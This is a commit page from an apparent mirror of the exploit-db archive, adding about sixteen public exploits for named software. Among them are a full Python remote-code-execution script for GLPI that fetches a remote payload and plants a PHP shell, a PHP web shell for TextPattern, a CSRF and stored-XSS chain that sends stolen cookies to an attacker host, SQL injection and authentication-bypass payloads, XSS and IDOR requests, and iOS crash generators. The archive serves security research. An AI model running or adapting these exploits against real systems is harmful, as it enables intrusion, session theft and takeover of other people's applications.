bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-06-15

Browse source 
16 changes to exploits/shellcodes

Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
Post-it 5.0.1 - Denial of Service (PoC)
Notex the best notes 6.4 - Denial of Service (PoC)
Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path
WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
GLPI 9.4.5 - Remote Code Execution (RCE)
COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
Small CRM 3.0 - 'Authentication Bypass' SQL Injection
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
This commit is contained in:
Offensive Security 2021-06-15 05:01:55 +00:00
parent 680a0b6cea
commit fe5d7c9048
17 changed files with 901 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
exploits/ios/dos/50001.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
# Version: 3.0.3
# Category: DoS (iOS)
##### Vulnerability #####
Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

37
exploits/ios/dos/50002.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/post-it/id920127738
# Version: 5.0.1
# Category: DoS (iOS)
##### Vulnerability #####
Post-it is vulnerable to a DoS condition when a long list of characters is
being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new
payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

36
exploits/ios/dos/50003.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)
##### Vulnerability #####
Notex the best notes is vulnerable to a DoS condition when a long list of
characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

2
exploits/multiple/webapps/49571.py
View file

@ -1,7 +1,7 @@
# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Date: 17 Feb 2020
# Exploit Author: Podalirius
# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# Vendor Homepage: https://gitea.io/
# Software Link: https://dl.gitea.io/
# Version: >= 1.1.0 to <= 1.12.5

1
exploits/multiple/webapps/49981.txt
View file

@ -5,6 +5,7 @@
# Software Link: https://www.cerberusftp.com/download/
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
# Tested on: windows server 2016
# CVE: CVE-2019-25046
------------
About Cerberus FTP Server (From Vendor Site) :

74
exploits/multiple/webapps/49990.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE-2021-34370
================================================================
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
================================================================
================================================================
Request Heeaders start
================================================================
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Connection: close
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
X-XSS-Protection: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73
Date: Tue, 08 Jun 2021 10:41:59 GMT
<script type='text/javascript'>document.location=''^alert`1`^''</script>
================================================================
Response Heeaders end
================================================================
Payload: %27^alert`1`^%27
for open redirect, replace the payload to a valid website.

82
exploits/multiple/webapps/49991.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Heeaders end
================================================================
contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR

241
exploits/php/webapps/49992.py Executable file
View file

@ -0,0 +1,241 @@
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)
# Exploit Author: Brian Peters
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: < 9.4.6
# CVE: CVE-2020-11060
# Download a SQL dump and find the table offset for "wifinetworks" with
# cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks
# Update the offsettable value with this number in the create_dump function
# The Nix/Win paths are based on defaults. You can use curl -I <url> and use md5sum to find the path based
# on the Set-Cookie hash.
#!/usr/bin/python
import argparse
import json
import random
import re
import requests
import string
import sys
import time
from datetime import datetime
from lxml import html
class GlpiBrowser:
def __init__(self, url, user, password, platform):
self.url = url
self.user = user
self.password = password
self.platform = platform
self.session = requests.Session()
self.session.verify = False
requests.packages.urllib3.disable_warnings()
def extract_csrf(self, html):
return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0]
def get_login_data(self):
r = self.session.get('{0}'.format(self.url), allow_redirects=True)
csrf_token = self.extract_csrf(r.text)
name_field = re.findall('name="(.*)" id="login_name"', r.text)[0]
pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0]
return name_field, pass_field, csrf_token
def login(self):
try:
name_field, pass_field, csrf_token = self.get_login_data()
except Exception as e:
print "[-] Login error: could not retrieve form data"
sys.exit(1)
data = {
name_field: self.user,
pass_field: self.password,
"auth": "local",
"submit": "Post",
"_glpi_csrf_token": csrf_token
}
r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False)
return r.status_code == 302
def wipe_networks(self, padding, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Edit network error: could not retrieve form data"
sys.exit(1)
webpage = html.fromstring(r.content)
links = webpage.xpath('//a/@href')
for rawlink in links:
if "wifinetwork.form.php?id=" in rawlink:
rawlinkparts = rawlink.split("=")
networkid = rawlinkparts[-1]
print "Deleting network "+networkid
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE"+padding,
"mode": "ad-hoc",
"purge": "Delete permanently",
"id": networkid,
"_glpi_csrf_token": csrf_token,
'_read_date_mod': datemod
}
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)
def create_network(self, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Create network error: could not retrieve form data"
sys.exit(1)
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE",
"mode": "ad-hoc",
"add": "ADD",
"_glpi_csrf_token": csrf_token,
'_read_date_mod': datemod
}
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)
print "[+] Network created"
print " Name: PoC"
print " ESSID: RCE"
def edit_network(self, padding, datemod):
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')
comment = r.content
#create the padding for the name and essid
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))
webpage = html.fromstring(r.content)
links = webpage.xpath('//a/@href')
for rawlink in links:
if "wifinetwork.form.php?id=" in rawlink:
rawlinkparts = rawlink.split('/')
link = rawlinkparts[-1]
#edit the network name and essid
r = self.session.get('{0}/front/{1}'.format(self.url, link))
try:
csrf_token = self.extract_csrf(r.text)
except Exception as e:
print "[-] Edit network error: could not retrieve form data"
sys.exit(1)
rawlinkparts = rawlink.split("=")
networkid = rawlinkparts[-1]
data = {
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": comment,
"essid": "RCE"+padding,
"mode": "ad-hoc",
"update": "Save",
"id": networkid,
"_glpi_csrf_token": csrf_token,
"_read_date_mod": datemod
}
r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data)
print "[+] Network mofified"
print " New ESSID: RCE"+padding
def create_dump(self, shellname):
path=''
if self.platform == "Win":
path="C:\\xampp\\htdocs\\pics\\"
elif self.platform == "Nix":
path="/var/www/html/glpi/pics/"
#adjust offset number to match the table number for wifi_networks
#this can be found by downloading a SQL dump and running cat <dumpname> | grep "CREATE TABLE" | grep -n "wifinetworks"
r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname))
print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname)
def shell_check(self, shellname):
r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname))
print " Shell size: "+str(len(r.content))
if "asdfasdfasdf" in r.content:
print "[+] RCE FOUND!"
sys.exit(1)
return len(r.content)
def pwn(self):
if not self.login():
print "[-] Login error"
return
else:
print "[+] Logged in"
#create timestamp
now = datetime.now()
datemod = now.strftime("%Y-%m-%d %H:%M:%S")
#create comment payload
tick=1
while True:
#create random shell name
letters = string.ascii_letters
shellname = ''.join(random.choice(letters) for i in range(8))+".php"
#create padding for ESSID
padding = ''
for i in range(1,int(tick)+1):
padding+=str(i)
self.wipe_networks(padding, datemod)
self.create_network(datemod)
self.edit_network(padding, datemod)
self.create_dump(shellname)
self.shell_check(shellname)
print "\n"
raw_input("Press any key to continue with the next iteration...")
tick+=1
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="Target URL", required=True)
parser.add_argument("--user", help="Username", required=True)
parser.add_argument("--password", help="Password", required=True)
parser.add_argument("--platform", help="Win/Nix", required=True)
args = parser.parse_args()
g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform)
g.pwn()

24
exploits/php/webapps/49993.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
# Date: 11/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP
# Description #
COVID19 Testing Management System 1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. Anyone can submit a stored XSS payload without login when registering as a new user. This makes the application store our payload in the database and it is fired everything the dashboard is viewed.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/covid-tms/new-user-testing.php
2) Enter the following payload in 'State' parameter: <script>alert(1)</script>
3) Fill out other information and submit query
4) Now goto: http://localhost/covid-tms/live-test-updates.php
5) Stored XSS payload is fired
# Image PoC : Reference Image #
1) Vulnerable Parameter: https://ibb.co/1vyNM2w
2) Payload Fired: https://ibb.co/CsfPnXK

52
exploits/php/webapps/49994.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
# Date: 11/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution.
- Vulnerable parameter: user_id=<injection point>
SQLmap command:
--------------
sqlmap -u http://<target_host>/stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=<your cookie>" --is-dba
SQLmap Output:
-------------
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH)
Trick:
-----
We could steal the users cookie by chaining CSRF and stored XSS
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<YOUR_TARGET>/stock/php_action/changeUsername.php" method="POST">
<input type="hidden" name="username" value=""><script> alert(document.cookie); var i=new Image; i.src="http://<YOUR_IP>:<YOUR_PORT>/?"+document.cookie; </script>" />
<input type="hidden" name="user&#95;id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
and then use the cookie to preform SQL injection :)

19
exploits/php/webapps/49995.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection
# Date: 12/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: XAMPP
# Description #
Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/crm/admin/
2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x
3) SQL Injection successfull

43
exploits/php/webapps/49996.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas

133
exploits/php/webapps/49998.py Executable file
View file

File diff suppressed because one or more lines are too long

48
exploits/windows/local/49997.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2021-06-11
# Vendor Homepage: https://www.spy-emergency.com/
# Software Link: https://www.spy-emergency.com/download/download.php?id=1
# Tested Version: 25.0.650.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """
Spy Emergency Health Check SpyEmrgHealth C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe Auto
Spy Emergency Engine Service SpyEmrgSrv C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe Auto
# Service info
C:>sc qc "SpyEmrgHealth"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgHealth
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Spy Emergency Health Check
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Service info
C:\>sc qc "SpyEmrgSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Spy Emergency Engine Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

32
exploits/windows/local/49999.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 13-06-2021
# Vendor Homepage: https://www.wibu.com
# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
# Tested Version: 6.51
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WIBU-KEY Server
WkSvW32.exe C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
Auto
C:\Users\IEUser>sc qc WkSvW32.exe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WkSvW32.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WIBU-KEY Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

29
exploits/windows/local/50004.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/
# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md
# Tested Version: 4.64
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Tftpd32 service edition Tftpd32_svc C:\Program
Files\Tftpd64_SE\tftpd64_svc.exe Auto
C:\Users\IEUser>sc qc Tftpd32_svc
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Tftpd32_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Tftpd32 service edition
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

14
files_exploits.csv
View file

@ -6798,6 +6798,9 @@ id,file,description,date,author,type,platform,port
49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",dos,ios,
50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",2021-06-14,"Geovanni Ruiz",dos,ios,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11358,6 +11361,9 @@ id,file,description,date,author,type,platform,port
49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,
49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows,
49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44145,3 +44151,11 @@ id,file,description,date,author,type,platform,port
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,
49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,
49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,
49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",2021-06-14,"BHAVESH KAUL",webapps,php,
49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php,
49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php,
49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php,
